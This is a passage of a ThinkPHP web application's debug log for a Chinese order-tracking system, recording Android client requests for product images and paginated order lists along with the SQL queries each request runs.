/alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:56+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=2&pageNum=10 [运行时间:0.052973s][吞吐率:18.88req/s] [内存消耗:4,769.92kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001047s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '2', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001484s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000481s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001363s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000310s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001416s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001029s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308136>orderinfo.end_time desc,1658308136>orderinfo.end_time desc,1658308136-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 20,10 [ RunTime:0.003855s ] --------------------------------------------------------------- [ 2022-07-20T17:08:56+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020344s][吞吐率:49.15req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000062s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001179s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:57+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.024265s][吞吐率:41.21req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001266s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:08:57+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020893s][吞吐率:47.86req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:10:34+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022261s][吞吐率:44.92req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001323s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:16+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020419s][吞吐率:48.97req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001170s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:19+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019605s][吞吐率:51.01req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001263s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:19+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020332s][吞吐率:49.18req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001114s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:20+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020727s][吞吐率:48.25req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001188s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:20+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=3&pageNum=10 [运行时间:0.053995s][吞吐率:18.52req/s] [内存消耗:4,769.89kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001114s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '3', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001669s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000579s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001637s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000350s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001729s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001281s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 40 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1658308280>orderinfo.end_time desc,1658308280>orderinfo.end_time desc,1658308280-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 30,10 [ RunTime:0.002771s ] --------------------------------------------------------------- [ 2022-07-20T17:11:20+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019324s][吞吐率:51.75req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001136s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:21+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.031067s][吞吐率:32.19req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000055s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001374s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001754s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000115s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:21+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019162s][吞吐率:52.19req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001083s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:21+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020238s][吞吐率:49.41req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001058s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:22+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029014s][吞吐率:34.47req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001088s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001615s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000132s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:22+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020929s][吞吐率:47.78req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001242s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:23+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021440s][吞吐率:46.64req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001366s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:11:23+08:00 ] 221.192.178.45 POST /api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=99&offset=4&pageNum=10 [运行时间:0.051967s][吞吐率:19.24req/s] [内存消耗:4,761.68kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001212s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=kotd47fn3qlt2emign2nuin444', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '99', 'offset' => '4', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001744s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000470s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001371s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 99 LIMIT 1 [ RunTime:0.000345s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001779s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001027s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtim